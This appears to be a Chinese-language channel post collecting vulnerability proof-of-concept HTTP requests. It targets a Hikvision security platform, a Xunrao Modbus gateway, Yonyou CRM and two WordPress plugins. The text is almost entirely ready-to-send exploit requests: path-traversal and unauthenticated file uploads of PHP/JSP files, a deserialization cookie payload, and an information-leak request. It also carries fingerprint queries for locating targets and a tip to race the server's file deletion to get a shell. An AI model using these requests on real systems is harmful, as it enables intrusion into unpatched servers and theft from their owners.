海康威视综合安防平台文件上传漏洞
上传过后文件会被服务器删除,利用条件竞争高频率请求文件拿shell
文件上传后的地址:/clusterMgr/123.jsp
POST /center_install/picUploadService/v1/uploadAllPackage/image HTTP/1.1
User-Agent: PostmanRuntime/7.36.1
Accept: */*
Postman-Token: 04eaee1f-c6cb-49fa-bf8e-88b839f98acc
Host: xx.xx.xx.xx
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=--------------------------553898708333958420021355
Content-Length: 233
----------------------------553898708333958420021355
Content-Disposition: form-data; name="sendfile"; filename="../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/123.jsp"
Content-Type: application/octet-stream
123
----------------------------553898708333958420021355--
上传过后文件会被服务器删除,利用条件竞争高频率请求文件拿shell
文件上传后的地址:/clusterMgr/123.jsp
👍2
迅饶科技X2Modbus网关GetUser 信息泄露漏洞
server="SunFull-Webs"
server="SunFull-Webs"
POST /soap/GetUser HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Content-Length: 58Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencoded
<GetUser><User Name="admin" Password="admin"/></GetUser>
用友crm文件上传漏洞
app.name="用友 CRM"
/tmpfile/{{path}}.tmp.php
app.name="用友 CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=---------------------------269520967239406871642430066855Content-Length: 355-----------------------------269520967239406871642430066855Content-Disposition: form-data; name="file"; filename="%s.php "Content-Type: application/octet-stream<?phpinfo();sleep(8);unlink(FILE);?>-----------------------------269520967239406871642430066855Content-Disposition: form-data; name="upload"upload-----------------------------269520967239406871642430066855--
/tmpfile/{{path}}.tmp.php
WordPress-thimpress_hotel_booking存在代码执行漏洞
GET / HTTP/1.1Host: User-Agent: Mozilla/5.0Connection: closeCookie: thimpress_hotel_booking_1=O:11:"WPHB_Logger":1:{s:21:"%00WPHB_Logger%00_handles"%3BC:33:"Requests_Utility_FilteredIterator":67:{x:i:0%3Ba:1:{i:0%3Bs:2:"-1"%3B}%3Bm:a:1:{s:11:"%00*%00callback"%3Bs:7:"phpinfo"%3B}}}Accept-Encoding: gzipWordPress-js-support-ticket存在文件上传漏洞
http://ip/wp-content/plugins/js-support-ticket/jssupportticketdata/supportImg/{{rand8}}.php
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1Host: Content-Type: multipart/form-data; boundary=--------767099171User-Agent: Mozilla/5.0 ----------767099171Content-Disposition: form-data; name="action"configuration_saveconfiguration----------767099171Content-Disposition: form-data; name="form_request"jssupportticket----------767099171Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"Content-Type: image/png<?php echo md5(123);unlink(__FILE__);?>----------767099171-- http://ip/wp-content/plugins/js-support-ticket/jssupportticketdata/supportImg/{{rand8}}.php
👍2❤1